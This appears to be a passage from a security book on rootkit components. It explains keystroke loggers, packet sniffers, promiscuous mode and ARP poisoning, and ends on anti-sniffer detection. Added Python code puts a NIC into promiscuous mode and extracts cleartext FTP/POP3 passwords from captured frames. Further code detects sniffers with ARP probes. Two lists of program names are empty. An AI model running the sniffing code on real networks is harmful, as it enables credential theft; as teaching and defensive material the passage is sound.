Another component of a rootkit is a sniffer or a keystroke logger, which the hacker can plant on a system to snare passwords, credit card numbers, or other valuable information transmitted across the network. A hacker may install a keystroke logger on one or more computers, though this increases the chance that the keystroke logger program may be detected.

Sniffers are less obvious because a hacker only needs to install one on a single computer and then switch that computer's network interface card (NIC) into promiscuous mode. Normally a NIC hands the operating system only the frames addressed to its own hardware address (plus broadcasts and any multicast groups it has joined); in promiscuous mode it passes up every frame it sees on the wire. One caveat: this only exposes other hosts' traffic on a shared medium such as a hub or a wireless LAN. A switch forwards unicast frames only to the port that owns the destination address, so on a switched network the attacker must first redirect traffic toward the sniffing host (for example by ARP poisoning) before a promiscuous NIC sees anything beyond its own conversations.

Once the sniffer retrieves one or more passwords, the hacker can use those valid passwords to hijack a legitimate user's account. Now the hacker can enter the computer under the disguise of a legitimate user, even in the middle of the night on a weekend when few legitimate users would be on the system. As a seemingly legitimate user, a hacker can leisurely browse a computer to better understand the software being used and the configuration of the network.
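As an added example (not code from the book or from any of the sniffer programs it mentions), the following Python script shows both halves of what the preceding paragraphs describe: putting a Linux NIC into promiscuous mode through the same socket option that libpcap/tcpdump use, and the pattern matching a password sniffer performs over captured frames to pull USER/PASS lines out of cleartext FTP and POP3 logins. The frames, addresses and credentials are constructed here for illustration; the raw-socket function needs root on Linux and is never called by the parsing code.

```python
import re
import socket
import struct
from typing import List, Optional, Tuple

ETH_P_ALL = 0x0003            # capture every Ethernet protocol
SOL_PACKET = 263              # Linux <linux/socket.h>
PACKET_ADD_MEMBERSHIP = 1     # Linux <linux/if_packet.h>
PACKET_MR_PROMISC = 1


def open_promiscuous_socket(iface: str) -> socket.socket:
    """Open a raw capture socket on `iface` and switch the NIC into
    promiscuous mode (Linux only, needs root / CAP_NET_RAW).  This is the
    same PACKET_ADD_MEMBERSHIP request that libpcap/tcpdump issue."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    s.bind((iface, 0))
    # struct packet_mreq { int ifindex; u16 type; u16 alen; u8 address[8]; }
    mreq = struct.pack("IHH8s", socket.if_nametoindex(iface),
                       PACKET_MR_PROMISC, 0, b"\x00" * 8)
    s.setsockopt(SOL_PACKET, PACKET_ADD_MEMBERSHIP, mreq)
    return s


def parse_frame(frame: bytes) -> Optional[Tuple[str, str, int, bytes]]:
    """Decode Ethernet/IPv4/TCP; return (src_ip, dst_ip, dst_port, payload)
    or None for anything else (ARP, IPv6, UDP, truncated frames)."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != 6 or len(ip) < ihl + 20:
        return None
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:]
    dport = struct.unpack("!H", tcp[2:4])[0]
    data_offset = (tcp[12] >> 4) * 4
    return src, dst, dport, tcp[data_offset:]


# Cleartext login commands of FTP (port 21) and POP3 (port 110): "USER x" / "PASS y".
CRED_RE = re.compile(rb"^(USER|PASS)[ \t]+(\S+)", re.IGNORECASE | re.MULTILINE)
CLEARTEXT_PORTS = {21, 110}


def extract_credentials(frames: List[bytes]) -> List[Tuple[str, str, str]]:
    """What a password sniffer logs: (conversation, field, value) for every
    USER/PASS line sent to a cleartext-login port."""
    found = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src, dst, dport, payload = parsed
        if dport not in CLEARTEXT_PORTS:
            continue
        for field, value in CRED_RE.findall(payload):
            found.append((f"{src}->{dst}:{dport}", field.decode().upper(), value.decode()))
    return found


def build_tcp_frame(src_ip: str, dst_ip: str, sport: int, dport: int, payload: bytes) -> bytes:
    """Construct a minimal Ethernet/IPv4/TCP frame for the sample capture.
    Checksums are left zero: these bytes never touch a wire, and a sniffer
    does not verify them anyway."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    return eth + ip + tcp + payload


# Constructed capture: an FTP login, a POP3 login, one HTTPS record and an
# ARP request.  Only the two cleartext logins yield anything.
SAMPLE_FRAMES = [
    build_tcp_frame("10.0.0.5", "10.0.0.20", 40001, 21, b"USER alice\r\n"),
    build_tcp_frame("10.0.0.5", "10.0.0.20", 40001, 21, b"PASS hunter2\r\n"),
    build_tcp_frame("10.0.0.7", "10.0.0.21", 40002, 110, b"USER bob\r\n"),
    build_tcp_frame("10.0.0.7", "10.0.0.21", 40002, 110, b"PASS letmein\r\n"),
    build_tcp_frame("10.0.0.7", "10.0.0.22", 40003, 443, bytes.fromhex("160303002a01000026")),
    bytes.fromhex("ffffffffffff" "001122334455" "0806") + b"\x00" * 28,
]

if __name__ == "__main__":
    for conversation, field, value in extract_credentials(SAMPLE_FRAMES):
        print(f"{conversation}  {field}={value}")
```

The HTTPS frame is the point of the exercise in reverse: the sniffer sees it just as well, but the payload is ciphertext, which is why encrypted logins defeat this class of rootkit component where cleartext FTP, POP3 and Telnet do not.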

If the sniffer happens to snare the password of a system administrator, the hacker can use the system administrator's account to gain root access. With root access, the hacker can create additional accounts, even accounts with system administrator privileges, so the hacker can get back into the computer through a phony "legitimate" account later.

To learn more about the capabilities of sniffers, take a look at these programs:








Sniffers actually have legitimate uses for analyzing and fixing a network. However, few people want a total stranger running a sniffer on their network. A system administrator can walk up to each computer and check whether its NIC is running in promiscuous mode (on Linux, for example, ifconfig or ip link reports a PROMISC flag on the interface), but the rootkit that planted the sniffer may also hide that flag, and checking every host by hand does not scale. Instead, administrators can run a variety of anti-sniffer tools (such as AntiSniff, shown in Figure 13-2) that probe the network from the outside, for example by sending frames a NIC in normal mode would discard and watching which hosts respond anyway, to find any rogue sniffers running on their network.

Figure 13-2: The AntiSniff program can check for hidden sniffers on a network.

Here are a few anti-sniffer programs:

The sentinel project
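Two of the checks such anti-sniffer tools rely on, as an added example in Python (not AntiSniff's or Sentinel's own code): reading the interface's PROMISC flag locally, and the remote "fake broadcast" ARP test, in which the prober sends an ARP request for the target's IP inside an Ethernet frame addressed to a bogus destination MAC. A NIC in normal mode drops that frame in hardware, so a host that answers must be accepting frames not addressed to it. All MAC and IP addresses, the reply frames and the flag values are constructed here for illustration; probe_host is the live version and needs root on Linux.

```python
import socket
import struct
from typing import Iterable, List, Optional, Tuple

IFF_PROMISC = 0x100   # <linux/if.h>: set while the NIC is in promiscuous mode

# Ethernet destination a NIC in normal mode silently discards: it is neither
# its own address nor the real broadcast ff:ff:ff:ff:ff:ff.  A promiscuous
# NIC passes it up anyway, and the IP stack answers the ARP request inside.
FAKE_BROADCAST = bytes.fromhex("fffffffffffe")


def is_promiscuous_from_flags(flags_text: str) -> bool:
    """Local check: /sys/class/net/<iface>/flags holds the IFF_* bitmask as
    hex text, e.g. "0x1103".  Cheap, but a rootkit can lie about it."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def read_local_promisc(iface: str) -> bool:
    with open(f"/sys/class/net/{iface}/flags") as f:
        return is_promiscuous_from_flags(f.read())


def build_arp_probe(src_mac: bytes, src_ip: str, target_ip: str,
                    dst_mac: bytes = FAKE_BROADCAST) -> bytes:
    """ARP who-has `target_ip`, wrapped in an Ethernet frame whose destination
    is the bogus MAC rather than the broadcast address."""
    eth = dst_mac + src_mac + b"\x08\x06"
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      src_mac, socket.inet_aton(src_ip),
                      b"\x00" * 6, socket.inet_aton(target_ip))
    return eth + arp


def parse_arp_reply(frame: bytes) -> Optional[Tuple[str, str]]:
    """Return (sender_mac, sender_ip) if `frame` is an ARP reply, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":
        return None
    _, _, _, _, opcode, smac, sip, _, _ = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    if opcode != 2:
        return None
    return smac.hex(":"), socket.inet_ntoa(sip)


def suspected_sniffers(probed_ips: Iterable[str], replies: Iterable[bytes]) -> List[str]:
    """Hosts that answered a probe they should never have seen."""
    probed = set(probed_ips)
    answered = {r[1] for r in map(parse_arp_reply, replies) if r and r[1] in probed}
    return sorted(answered)


def probe_host(iface: str, src_mac: bytes, src_ip: str, target_ip: str,
               timeout: float = 2.0) -> bool:
    """Live version (Linux, root): send one probe and wait for a reply."""
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0806))
    s.bind((iface, 0))
    s.settimeout(timeout)
    try:
        s.send(build_arp_probe(src_mac, src_ip, target_ip))
        while True:
            reply = parse_arp_reply(s.recv(65535))
            if reply and reply[1] == target_ip:
                return True
    except socket.timeout:
        return False
    finally:
        s.close()


def build_arp_reply(sender_mac: bytes, sender_ip: str, dst_mac: bytes, dst_ip: str) -> bytes:
    """Constructed reply frame, used only to simulate a promiscuous host."""
    return dst_mac + sender_mac + b"\x08\x06" + struct.pack(
        "!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 2,
        sender_mac, socket.inet_aton(sender_ip), dst_mac, socket.inet_aton(dst_ip))


# Constructed scenario: three hosts are probed; only 10.0.0.20 (the box with
# the sniffer) answers.  10.0.0.99 also replies but was never probed, and an
# unrelated ARP request from 10.0.0.30 is on the wire as well.
PROBER_MAC, PROBER_IP = bytes.fromhex("020000000001"), "10.0.0.2"
PROBED = ["10.0.0.20", "10.0.0.21", "10.0.0.22"]
RECEIVED = [
    build_arp_reply(bytes.fromhex("001122334455"), "10.0.0.20", PROBER_MAC, PROBER_IP),
    build_arp_reply(bytes.fromhex("00deadbeef00"), "10.0.0.99", PROBER_MAC, PROBER_IP),
    build_arp_probe(bytes.fromhex("00aabbccddee"), "10.0.0.30", "10.0.0.2"),
]

if __name__ == "__main__":
    print("flag 0x1103 means promiscuous:", is_promiscuous_from_flags("0x1103"))
    print("suspected sniffers:", suspected_sniffers(PROBED, RECEIVED))
```

Which bogus destination addresses provoke a reply depends on the target's operating system (the kernel stack filters too, not only the NIC), so real tools try several variants and combine the ARP test with timing and DNS-lookup tests; treat a single hit as a lead to verify on the host, not as proof.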